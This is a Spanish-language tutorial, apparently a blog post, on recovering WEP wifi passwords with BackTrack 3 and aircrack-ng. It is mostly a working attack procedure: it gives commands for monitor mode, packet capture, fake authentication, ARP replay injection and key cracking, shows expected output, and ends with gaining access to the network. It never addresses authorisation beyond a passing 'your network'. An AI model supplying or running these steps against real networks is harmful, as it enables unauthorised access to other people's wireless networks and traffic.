Hoy vamos a aprender a desencriptar las contraseñas de los puntos de red wifi protegidos, usaremos una distro de GNU/Linux llamada Bactrack 3 y una computadora portatil.
Sugiero que prueben esta guía en su maquina y cuenten como les funciono…
*Update*
Aquí pueden ver una lista de compatibilidad de Laptops
Y aquí una de Tarjetas Wireless
Que es lo que necesitamos?
Para que se nos haga mas fácil, vamos a usar Backtrack 3 versión USB, la podemos encontrar aquí, Backtrack 3.
Al descomprimirlo, vamos a ver dos folders, los copiamos al root de nuestra memoria usb (ej. E:/) luego lanzamos el command prompt (Inicio / ejecutar / cmd) dentro de la terminal navegamos hasta nuestra memoria usb, en este caso tecleamos e: y le damos enter.
Tecleamos cd boot para ir a este folder dentro de nuestra memoria, estando ahi adentro tecleamos bootinst.bat seguimos las instrucciones y luego de esto ya podemos arrancar con nuestra distro de bactrack.
Ahora al reiniciar la computadora, presionamos el boton para seleccionar de donde arrancar (Varia con cada computadora, lee el manual de usuario) y seleccionamos la memoria usb.
Ya dentro del sistema operativo, se darán cuenta (Para los que no han usado linux) de que es similar a Windows.
Vamos con la parte principal.
Para abrir una presionamos el cuadrado negro que esta al lado del “menu de inicio”.
En una terminal ponemos:
airmon-ng start wifi0 (Ojo, es un cero no una “O”)
Después de esto ponemos:
airodump-ng eth1
Cuando encuentres tu red wifi ctrl+c para parar la búsqueda y escribimos:
airodump-ng -c [channel] –bssid [AP MAC] -w [filename] eth1
donde(no hay que poner corchetes):
[channel] es el canal
[AP MAC] es la dirección mac, XX:XX:XX:XX:XX
[filename] el nombre de archivo que le quieres dar, por ejemplo “casa”, muy importante no olvidar esto.
Después de esto, abrimos una nueva terminal y escribimos lo siguiente
aireplay-ng –fakeauth 0 -e [AP SSID] -a [AP MAC] eth1
donde:
[AP SSID] es el nombre del Punto de acceso: Por ejemplo WLANCASA o lo que salga ahi en la primera terminal.
Si nos sale lo siguiente, vamos muy bien:
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful
Si no, probaremos con este comando:
Aireplay-ng –fakeauth 6000 -o 1 -q 10 -e [AP SSID] -a [AP MAC] eth1
(Si usamos esta segunda opcion, el siguiente paso lo haremos en una terminal nueva)
Y deberíamos de obtener algo asi:
18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful
18:22:42 Sending keep-alive packet
18:22:52 Sending keep-alive packet
Si no nos funciona, no podremos seguir trabajando con esa red, repasa los pasos, algo hiciste mal.
Ya vamos dentro, empezamos con la etapa de inyección.
En la terminal escribimos
aireplay-ng -3 -b [AP MAC] eth1 -x 250
Esto va a tomar un rato, veras como la columna de numeros empieza a moverse.
Espera hata tener unos 40.000 más o menos (o puedes esperar unos 5 minutos) y abre una tercera terminal.
aircrack-ng -z -b [AP MAC] [filename*.cap]
En filename ponemos el nombre del archivo que usamos antes, en este caso seria casa.cap
En unos momentos aparecerá la clave, la apuntamos en un papel, reiniciamos con nuestro sistema preferido y ya tenemos acceso a la red…
Saludos.
